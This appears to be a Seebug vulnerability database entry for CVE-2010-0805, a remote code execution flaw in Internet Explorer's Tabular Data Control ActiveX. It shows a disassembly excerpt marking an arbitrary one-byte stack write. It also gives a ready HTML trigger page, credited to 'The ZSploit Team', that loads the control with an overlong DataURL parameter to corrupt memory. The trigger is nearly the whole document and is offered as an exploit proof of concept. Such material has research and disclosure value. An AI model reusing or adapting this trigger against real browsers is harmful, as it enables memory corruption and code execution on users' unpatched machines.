Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution Vulnerability

ID SSV:19391
Type seebug
Reporter Root
Modified 2010-04-04T00:00:00


No description provided by source.

                                                # CVE : CVE-2010-0805
.text:600058F7                 and     [ebp+pv], 0
.text:600058FE                 lea     eax, [ebp+pv]
.text:60005904                 push    eax             ; unsigned __int16 **
.text:60005905                 push    dword ptr [ebx+10h] ; struct IOleClientSite *
.text:60005908                 call    GetHostURL(IOleClientSite *,ushort * *)
.text:6000590D                 mov     eax, [ebp+var_218]
.text:60005913                 push    [ebp+pv]        ; pv
.text:60005919                 mov     [ebp+eax+var_204], 0
.text:60005921                 mov     eax, [ebp+var_21C]    ; length of the DataURL param
.text:60005927                 mov     [ebp+eax+var_104], 0        ; write one byte to arbitrary stack address
<title>Trigger for ZDI-10-034 by</title>
<object classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
<param name="DataURL" value="http://zsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploitzsploi"/>
The ZSploit Team